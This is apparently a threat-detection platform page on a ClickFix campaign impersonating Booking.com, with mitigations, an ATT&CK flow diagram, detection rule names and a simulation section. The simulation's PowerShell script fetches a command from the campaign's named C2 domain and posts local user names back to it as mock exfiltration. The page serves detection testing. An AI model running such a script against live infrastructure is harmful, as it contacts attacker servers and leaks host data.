Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report outlines a ClickFix campaign in which a malicious website impersonating Booking.com to persuade users to copy and run a PowerShell command. Once executed, the command launches a fileless PowerShell script that downloads a second-stage ZIP archive. The dropper collects host information, writes the payload into the temporary directory, and creates persistence through both a Run registry key and a scheduled task. The full infection chain relies on convincing web content and user-driven execution rather than an obvious exploit.
Investigation
Stormshield analysts captured the JavaScript responsible for retrieving a PowerShell command from a command-and-control domain and placing it into the user’s clipboard. They also analyzed the PowerShell dropper, which collected detailed system information through WMI queries and environment variables before exfiltrating the data through a GET request. The same dropper then downloaded a ZIP archive from a second domain, extracted its contents, and configured persistence on the compromised host. Researchers mapped the observed behaviors and techniques to their corresponding MITRE ATT&CK identifiers.
Mitigation
Organizations should block the malicious domains and URLs tied to the ClickFix campaign and apply strict web filtering to reduce exposure to phishing-style landing pages. Defenders should monitor for PowerShell execution with flags such as -ExecutionPolicy Bypass and hidden window settings, while also limiting the execution of unsigned PowerShell scripts through application control. Additional detections should focus on the creation of suspicious Run registry keys and scheduled tasks with unfamiliar names.
Response
Security teams should alert on outbound traffic to the identified command-and-control domains and on PowerShell command lines that use Invoke-Expression to execute remotely retrieved content. Detection logic should also cover the creation of the specific Run registry value and scheduled task name associated with the campaign. If the activity is confirmed, isolate the endpoint immediately, collect volatile evidence, and perform forensic review of temporary files and the downloaded ZIP payload.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffeb99 classDef tool fill:#ccffcc classDef process fill:#ffcccc classDef persistence fill:#ddddff %% Nodes action_initial["<b>Action</b> – Initial Access: Malicious copyu2011paste webpage"] tech_user_exec["<b>Technique</b> – T1204.004 User Execution: Malicious Copy and Paste"] process_ps["<b>Process</b> – PowerShell command copied to clipboard"] tech_ps["<b>Technique</b> – T1059.001 PowerShell"] tech_process_inject["<b>Technique</b> – T1055.011 Process Injection"] action_discovery["<b>Action</b> – System Discovery"] tech_account_discovery["<b>Technique</b> – T1087 Account Discovery"] tech_security_sw["<b>Technique</b> – T1518.001 Security Software Discovery"] tech_time_discovery["<b>Technique</b> – T1124 System Time Discovery"] action_c2["<b>Action</b> – Command and Control"] tech_http_c2["<b>Technique</b> – T1071.001 Web Protocols (HTTP)"] action_download["<b>Action</b> – Payload Download"] tech_ingress["<b>Technique</b> – T1105 Ingress Tool Transfer"] action_deploy["<b>Action</b> – Deploy payload (ZIP extraction)"] action_persistence["<b>Action</b> – Persistence establishment"] tech_registry_run["<b>Technique</b> – T1547.001 Registry Run Keys / Startup Folder"] tech_scheduled_task["<b>Technique</b> – T1053.005 Scheduled Task/Job: At Logon"] action_final["<b>Action</b> – Final execution of payload"] process_payload["<b>Process</b> – Extracted executable or batch file"] %% Connections action_initial –>|triggers| tech_user_exec tech_user_exec –>|leads to| process_ps process_ps –>|executes| tech_ps tech_ps –>|may perform| tech_process_inject tech_process_inject –>|enables| action_discovery action_discovery –>|uses| tech_account_discovery action_discovery –>|uses| tech_security_sw action_discovery –>|uses| tech_time_discovery action_discovery –>|sends data to| action_c2 action_c2 –>|uses| tech_http_c2 action_c2 –>|triggers| action_download action_download –>|uses| tech_ingress action_download –>|stores file in| action_deploy action_deploy –>|creates| action_persistence action_persistence –>|uses| tech_registry_run action_persistence –>|fallback| tech_scheduled_task action_persistence –>|enables| action_final action_final –>|launches| process_payload %% Class Assignments class action_initial action class tech_user_exec technique class process_ps process class tech_ps technique class tech_process_inject technique class action_discovery action class tech_account_discovery technique class tech_security_sw technique class tech_time_discovery technique class action_c2 action class tech_http_c2 technique class action_download action class tech_ingress technique class action_deploy action class action_persistence action class tech_registry_run technique class tech_scheduled_task technique class action_final action class process_payload process "
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Download or Upload via Powershell (via cmdline)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
View
Possible System Information Discovery Using Wmi Powershell Module (via powershell)
View
Detection of Malicious PowerShell Execution with ClickFix Technique [Windows Powershell]
View
Detect ClickFix Phishing Command Fetch and Telemetry [Webserver]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker, having obtained a foothold on a compromised internal workstation, issues a PowerShell one‑liner that contacts the ClickFix C2 URL with the?get_command=1parameter via an HTTP POST. The server returns a PowerShell payload that enumerates local user accounts (T1087), checks system time (T1124), discovers installed security products (T1518.001), and then copies the output to the clipboard. The clipboard content is subsequently posted back to the ClickFix server for exfiltration, fulfilling T1204.004 and T1547.001. This exact traffic pattern matches the Sigma rule’srequest_uri|contains: "?get_command=1"andhttp_method: POSTconditions. -
Regression Test Script:
# ClickFix Command Fetch Simulation – triggers the Sigma rule $url = "https://accountpulsecentre.help/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1" $payload = @{ dummy = "data" } # Send the malicious POST request $response = Invoke-WebRequest -Uri $url -Method POST -Body ($payload | ConvertTo-Json) -ContentType "application/json" # Simulate execution of the fetched PowerShell command (simplified) $psCommand = $response.Content Write-Output "Fetched command: $psCommand" # For demonstration, run a harmless subset (e.g., get local users) and copy to clipboard $users = Get-LocalUser | Select-Object -ExpandProperty Name $usersString = $users -join "`n" Set-Clipboard -Value $usersString # Exfiltrate clipboard content back to ClickFix server (simulated) $exfilUrl = "https://accountpulsecentre.help/collect" Invoke-WebRequest -Uri $exfilUrl -Method POST -Body @{clipboard=$usersString} -ContentType "application/x-www-form-urlencoded" -
Cleanup Commands:
# Remove any temporary files or artifacts created during the test Clear-Clipboard Write-Output "Cleanup complete – clipboard cleared."